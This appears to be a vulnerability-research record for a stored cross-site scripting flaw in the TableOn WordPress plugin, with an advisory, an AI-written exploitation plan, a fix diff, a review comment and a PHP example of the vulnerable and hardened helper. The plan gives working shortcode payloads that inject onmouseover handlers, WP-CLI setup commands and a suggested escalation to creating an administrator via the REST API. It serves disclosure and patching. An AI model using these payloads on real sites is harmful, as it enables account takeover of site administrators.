[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvAsXBKV3sOrFN8nkzwGIajXw0wZuKaTy_ehTHdYfm3U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-3513","tableon-wordpress-posts-table-filterable-authenticated-contributor-stored-cross-site-scripting-via-class-shortcode-attri","TableOn – WordPress Posts Table Filterable \u003C= 1.0.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute","The TableOn – WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tableon_button' shortcode in all versions up to and including 1.0.4.4. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes such as 'class', 'help_link', 'popup_title', and 'help_title'. The do_shortcode_button() function extracts these attributes without sanitization and passes them to TABLEON_HELPER::draw_html_item(), which concatenates attribute values into HTML using single quotes without escaping (line 29: $item .= \" {$key}='{$value}'\"). 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","posts-table-filterable",null,"\u003C=1.0.4.4","1.0.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 15:35:29","2026-04-08 03:36:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F33490873-da99-465e-bfb6-44d2ba84f3ee?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3513 (TableOn Stored XSS)\n\n## 1. Vulnerability Summary\nThe **TableOn – WordPress Posts Table Filterable** plugin (up to version 1.0.4.4) contains a stored cross-site scripting (XSS) vulnerability. The vulnerability resides in the processing of the `[tableon_button]` shortcode. Specifically, the function `do_shortcode_button()` parses user-provided attributes (such as `class`, `help_link`, `popup_title`, and `help_title`) and passes them to `TABLEON_HELPER::draw_html_item()`. \n\nInside `draw_html_item()`, the plugin concatenates these attribute values directly into an HTML string using single quotes (`'`) without performing proper sanitization or escaping. Because the values are wrapped in single quotes, an attacker can break out of the attribute context with a single quote and inject an arbitrary HTML event handler (such as `onmouseover`). Event handlers are the practical vector here: a Contributor's post content passes through `wp_kses` on save, which strips a raw `\u003Cscript>` tag but leaves the shortcode text, including its quoted attribute values, untouched, so the injected quote and handler survive until the shortcode is rendered.\n\n## 2. 
Attack Vector Analysis\n- **Vulnerable Shortcode:** `[tableon_button]`\n- **Vulnerable Attributes:** `class`, `help_link`, `popup_title`, `help_title`.\n- **Authentication Level:** Contributor+ (any user who can create or edit posts; Contributors cannot create pages).\n- **Vulnerable Sink:** `TABLEON_HELPER::draw_html_item()` at line 29: `$item .= \" {$key}='{$value}'\"`.\n- **Precondition:** The attacker must be able to save a post containing the malicious shortcode and have it rendered. A Contributor cannot publish directly, but can preview the draft and submit it for review; the payload reaches other users when an Editor or Administrator previews or publishes the pending post.\n\n## 3. Code Flow\n1.  **Entry Point:** A user with Contributor-level access creates a post containing the shortcode: `[tableon_button class=\"...\"]`.\n2.  **Shortcode Handling:** When the post is rendered, WordPress calls the handler for `tableon_button`, which is `do_shortcode_button()`.\n3.  **Attribute Extraction:** `do_shortcode_button()` extracts the attributes from the shortcode.\n4.  **Vulnerable Processing:** The extracted (and unsanitized) attributes are passed to `TABLEON_HELPER::draw_html_item()`.\n5.  **The Sink:** Inside `draw_html_item()`, the code iterates through the attributes and builds the HTML:\n    ```php\n    \u002F\u002F Inferred logic based on description\n    foreach ($attributes as $key => $value) {\n        $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n    }\n    ```\n6.  **Output:** The malformed HTML is returned and rendered in the browser of any user viewing the post.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability triggered via a shortcode in post content. \n- **Injection Phase:** Creating the post as a Contributor does not require a plugin-specific nonce; it uses the standard WordPress `_wpnonce` for the `post.php` or `admin-ajax.php` (autosave) endpoints.\n- **Execution Phase:** No nonce is required to trigger the XSS. 
The payload executes automatically when the post is viewed by a victim.\n\nSince the exploit involves creating a post, we will use **WP-CLI** to bypass the need for browser-based nonce extraction during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload into the `class` attribute of the `[tableon_button]` shortcode that executes when an administrator views the post.\n\n### Step 1: Inject the Malicious Shortcode\nWe will create a new post as a Contributor. The payload will break out of the single-quoted attribute context.\n\n**Payload:** `poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'`\n\n**Shortcode:**\n`[tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;background:red;display:block;'\"]`\n\n### Step 2: Trigger the XSS\nNavigate to the published post (or preview it) as an Administrator.\n\n### HTTP Request Details (Simulating viewing the post)\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p={POST_ID}`\n- **Tool:** `http_request`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `posts-table-filterable` version 1.0.4.4 is installed.\n2.  **Create Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n3.  **Create Malicious Post:**\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Table Test\" --post_author=$(wp user get attacker --field=ID) --post_content='[tableon_button class=\"poc-class'\\'' onmouseover='\\''alert(document.domain)'\\'' style='\\''padding:100px;background:red;display:block;'\\'']'\n    ```\n    *(Note: Escaping single quotes in the CLI command is necessary)*\n\n## 7. 
Expected Results\nWhen the page is rendered, the HTML source for the button will look like this (the element name is assumed; the advisory does not say which tag `draw_html_item()` emits):\n```html\n\u003Cdiv class='poc-class' onmouseover='alert(document.domain)' style='padding:100px;background:red;display:block;' ...>\n```\nWhen a user (e.g., Administrator) hovers over the large red area, an alert box showing the document domain will appear.\n\n## 8. Verification Steps\n1.  **Check HTML Source:** Use `http_request` to fetch the post content and verify the `onmouseover` attribute is present and unescaped.\n    ```bash\n    # Search for the injected payload in the response body\n    grep \"onmouseover='alert(document.domain)'\"\n    ```\n2.  **Verify via Browser:** Use `browser_navigate` to the post URL and use `browser_eval` to check if the payload exists in the DOM.\n    ```javascript\n    browser_eval(\"document.querySelector('.poc-class').getAttribute('onmouseover')\")\n    ```\n\n## 9. Alternative Approaches\nIf the `class` attribute is somehow filtered, try other vulnerable attributes mentioned in the description:\n\n**Using `help_link`:**\n`[tableon_button help_link=\"http:\u002F\u002F' onmouseover='alert(1)\"]`\n\n**Using `popup_title`:**\n`[tableon_button popup_title=\"Title' onmouseover='alert(1)\"]`\n\n**Using `help_title`:**\n`[tableon_button help_title=\"Help' onmouseover='alert(1)\"]`\n\nIf an Administrator victim is required for high impact, note that WordPress sets its authentication cookies HttpOnly, so reading them from script is not the realistic path. Instead the payload should act with the victim's session from inside the page, for example by creating a new administrator through the WordPress REST API using the REST nonce that is available in the logged-in context.","The TableOn plugin for WordPress (\u003C= 1.0.4.4) is vulnerable to Stored Cross-Site Scripting via the '[tableon_button]' shortcode. 
Due to insufficient sanitization and escaping in the draw_html_item helper function, authenticated users with Contributor-level access can inject arbitrary web scripts into shortcode attributes like 'class', which execute when the page is viewed.","\u002F\u002F classes\u002Fhelper.php (Line 29 or similar depending on file structure)\n\u002F\u002F Inside TABLEON_HELPER::draw_html_item()\n\nforeach ($attributes as $key => $value) {\n    $item .= \" {$key}='{$value}'\"; \u002F\u002F Line 29: VULNERABLE CONCATENATION\n}\n\n--- \n\n\u002F\u002F do_shortcode_button() entry point\n\u002F\u002F Extracting attributes without sanitization before passing to the helper\n$class = isset($atts['class']) ? $atts['class'] : '';\n$help_link = isset($atts['help_link']) ? $atts['help_link'] : '';\n$popup_title = isset($atts['popup_title']) ? $atts['popup_title'] : '';\n\u002F\u002F ... values then passed to TABLEON_HELPER::draw_html_item","--- classes\u002Fhelper.php\n+++ classes\u002Fhelper.php\n@@ -26,7 +26,7 @@\n         $item = \"\u003C{$tag}\";\n         foreach ($attributes as $key => $value) {\n-            $item .= \" {$key}='{$value}'\";\n+            $item .= \" \" . esc_attr($key) . \"='\" . esc_attr($value) . \"'\";\n         }\n         $item .= \">\";","The exploit is achieved by an authenticated attacker (Contributor level or higher) performing the following steps: \n1. Authenticate to the WordPress dashboard as a Contributor.\n2. Create a new post or edit an existing one.\n3. Insert the '[tableon_button]' shortcode using a malicious attribute payload. For example: [tableon_button class=\"poc' onmouseover='alert(document.domain)' style='padding:50px;display:block;'\"]\n4. Preview the post, or submit it for review so that an Editor or Administrator previews or publishes it (Contributors cannot publish directly).\n5. The plugin processes the shortcode via do_shortcode_button() and passes the 'class' attribute unsanitized to TABLEON_HELPER::draw_html_item().\n6. 
The helper function concatenates the payload into HTML using single quotes, allowing the attacker's single quote to break out of the attribute context and inject an 'onmouseover' event handler.\n7. When an administrator or any other user views the post and interacts with (hovers over) the injected element, the malicious script executes.","gemini-3-flash-preview","2026-04-17 20:43:05","2026-04-17 20:43:28",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fposts-table-filterable\u002Ftags"]
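Review bot: in the research_fix_diff hunk, `esc_attr($key)` only stops a key from breaking out of the tag; it does not stop a caller from passing an attribute name such as `onmouseover`, which `esc_attr` leaves untouched, so the helper still fully trusts whoever builds `$attributes`. Since `draw_html_item()` is a shared helper, validate `$key` against a fixed allow-list of attribute names (or `continue` on anything unknown) instead of escaping it, and treat `help_link` as a URL: if it lands in an `href`, it needs `esc_url()` rather than `esc_attr()`, because `esc_attr()` does not reject `javascript:` URLs.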
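The attribute-context break-out described in the research plan, beside the shape of the fix shown in the diff, as an added PHP example that is not the plugin's code. The vulnerable helper is reconstructed from the advisory's one-line description; the `draw_html_item` signature, the `div` element, and the stand-in `esc_attr`/`esc_url` shims are assumptions, and the hardened version adds the attribute-name allow-list and URL handling that `esc_attr` alone does not provide. Requires PHP 8 for `str_contains`.

```php
<?php
declare(strict_types=1);

// Stand-ins for the WordPress escaping helpers so this file runs without
// WordPress loaded (assumption: they approximate, not reproduce, the real ones;
// real esc_url() accepts a longer protocol list and normalises the URL).
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    function esc_url(string $url): string {
        $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
        if ($scheme !== '' && !in_array($scheme, ['http', 'https', 'mailto'], true)) {
            return '';  // drop javascript:, data: and anything else unexpected
        }
        return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable shape reconstructed from the advisory (signature is an assumption):
// each value lands inside a single-quoted attribute exactly as supplied.
function draw_html_item_vulnerable(string $tag, array $attributes): string {
    $item = "<{$tag}";
    foreach ($attributes as $key => $value) {
        $item .= " {$key}='{$value}'";
    }
    return $item . '>';
}

// Hardened shape: fixed allow-list of attribute names (so no caller can smuggle
// an on* attribute through $key), esc_attr() on every value, and esc_url() for
// the one attribute that is a URL. The tag name is validated as well.
function draw_html_item_hardened(string $tag, array $attributes): string {
    static $allowed = [
        'class'       => 'attr',
        'help_link'   => 'url',   // assumption: rendered into an href
        'popup_title' => 'attr',
        'help_title'  => 'attr',
    ];
    if (!preg_match('/^[a-z][a-z0-9]*$/', $tag)) {
        throw new InvalidArgumentException('unexpected tag name');
    }
    $item = "<{$tag}";
    foreach ($attributes as $key => $value) {
        if (!isset($allowed[$key])) {
            continue;  // unknown attribute name: drop it rather than escape it
        }
        $value   = (string) $value;
        $escaped = $allowed[$key] === 'url' ? esc_url($value) : esc_attr($value);
        $item   .= " {$key}='{$escaped}'";
    }
    return $item . '>';
}

// Constructed sample input: the advisory's class payload as the shortcode
// parser would hand it over, plus a javascript: URL in help_link.
function sample_attributes(): array {
    return [
        'class'     => "poc' onmouseover='alert(document.domain)' style='display:block;",
        'help_link' => 'javascript:alert(1)',
    ];
}

// True when the vulnerable build yields a live event handler and the hardened
// build yields neither the handler nor the javascript: URL.
function breakout_demonstrated(): bool {
    $vuln = draw_html_item_vulnerable('div', sample_attributes());
    $safe = draw_html_item_hardened('div', sample_attributes());
    return str_contains($vuln, " onmouseover='alert(document.domain)'")
        && !str_contains($safe, " onmouseover='")
        && !str_contains($safe, 'javascript:');
}

if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    echo draw_html_item_vulnerable('div', sample_attributes()), PHP_EOL;
    echo draw_html_item_hardened('div', sample_attributes()), PHP_EOL;
    echo breakout_demonstrated() ? "break-out reproduced; hardened output is inert" : "unexpected", PHP_EOL;
}
```

Run with `php example.php`: the first line shows the injected quote closing `class` and `onmouseover` becoming a real attribute, the second shows the same payload kept inside the attribute value as `&#039;`-encoded text with `help_link` emptied. The allow-list matters because `esc_attr()` on the key, as in the page's diff, would still let a caller emit `onmouseover='...'` verbatim.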